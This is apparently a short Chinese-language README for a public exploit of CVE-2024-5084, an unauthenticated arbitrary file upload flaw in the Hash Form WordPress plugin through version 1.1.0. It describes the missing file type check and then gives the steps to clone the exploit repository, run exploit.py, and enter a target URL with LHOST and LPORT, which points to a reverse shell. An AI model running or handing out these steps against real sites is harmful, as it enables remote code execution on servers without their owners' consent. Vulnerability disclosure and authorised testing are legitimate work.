Hash Form – WordPress 的拖放表单构建器插件在 1.1.0 及之前的所有版本中,由于 'file_upload_action' 函数缺少文件类型验证,存在任意文件上传漏洞。这使得未经身份验证的攻击者能够将任意文件上传到受影响站点的服务器上,从而可能实现远程代码执行。
git clone https://github.com/Raeezrbr/CVE-2024-5084.git
cd CVE-2024-5084
python3 exploit.py
然后输入您的目标 URL 以及 LHOST IP 和 LPORT